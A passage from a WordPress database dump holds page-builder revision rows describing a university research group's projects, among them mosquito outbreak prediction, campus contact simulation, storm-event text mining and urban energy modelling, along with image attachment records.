positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.<\\/p>\"}}],\"styleRef\":341,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c7\",\"parentId\":\"126-c3\",\"partialId\":126,\"styleRef\":345,\"type\":\"content\"}],\"id\":\"126-c3\",\"parentId\":\"126-c2\",\"partialId\":126,\"styleRef\":340,\"type\":\"content\"}],\"id\":\"126-c2\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":339,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, and hybrid is similar to our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2022-04-18 11:50:05','2022-04-18 15:50:05','',438,'https://gsudice.dataconn.net/?p=1156',0,'revision','',0),(1162,1,'2022-04-18 11:50:55','2022-04-18 15:50:55','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-BeforeSimulCast-1.png','cropped-BeforeSimulCast-1.png','','inherit','open','closed','','cropped-beforesimulcast-1-png','','','2022-04-18 11:50:55','2022-04-18 15:50:55','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-BeforeSimulCast-1.png',0,'attachment','image/png',0),(1164,1,'2022-04-18 11:51:02','2022-04-18 15:51:02','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c4\",\"parentId\":\"126-c3\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c4\",\"index\":0,\"id\":\"126-c5\",\"partialId\":126,\"styleRef\":342,\"type\":\"content\",\"props\":{\"content\":\"AeMos: An Early Warning Systems for Aedes Mosquito Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c4\",\"index\":2,\"id\":\"126-c6\",\"partialId\":126,\"styleRef\":344,\"type\":\"content\",\"props\":{\"content\":\"<p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.<\\/p>\"}}],\"styleRef\":341,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c7\",\"parentId\":\"126-c3\",\"partialId\":126,\"styleRef\":345,\"type\":\"content\"}],\"id\":\"126-c3\",\"parentId\":\"126-c2\",\"partialId\":126,\"styleRef\":340,\"type\":\"content\"}],\"id\":\"126-c2\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":339,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, and hybrid is similar to our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2022-04-18 11:51:02','2022-04-18 15:51:02','',438,'https://gsudice.dataconn.net/?p=1164',0,'revision','',0),(1187,1,'2022-04-22 10:01:42','2022-04-22 14:01:42','','388de91c055c0831e049331d9ba8335e','','inherit','open','closed','','388de91c055c0831e049331d9ba8335e','','','2022-04-22 10:01:42','2022-04-22 14:01:42','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/388de91c055c0831e049331d9ba8335e.jpg',0,'attachment','image/jpeg',0),(1188,1,'2022-04-22 10:01:52','2022-04-22 14:01:52','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-388de91c055c0831e049331d9ba8335e-scaled-1.jpg','cropped-388de91c055c0831e049331d9ba8335e-scaled-1.jpg','','inherit','open','closed','','cropped-388de91c055c0831e049331d9ba8335e-scaled-1-jpg','','','2022-04-22 10:01:52','2022-04-22 14:01:52','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-388de91c055c0831e049331d9ba8335e-scaled-1.jpg',0,'attachment','image/jpeg',0),(1197,1,'2022-04-22 11:00:11','2022-04-22 15:00:11','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c4\",\"parentId\":\"126-c3\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c4\",\"index\":0,\"id\":\"126-c5\",\"partialId\":126,\"styleRef\":342,\"type\":\"content\",\"props\":{\"content\":\"AeMos: An Early Warning Systems for Aedes Mosquito Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c4\",\"index\":2,\"id\":\"126-c6\",\"partialId\":126,\"styleRef\":344,\"type\":\"content\",\"props\":{\"content\":\"<p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.<\\/p>\"}}],\"styleRef\":341,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c7\",\"parentId\":\"126-c3\",\"partialId\":126,\"styleRef\":345,\"type\":\"content\"}],\"id\":\"126-c3\",\"parentId\":\"126-c2\",\"partialId\":126,\"styleRef\":340,\"type\":\"content\"}],\"id\":\"126-c2\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":339,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, and hybrid is similar to our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 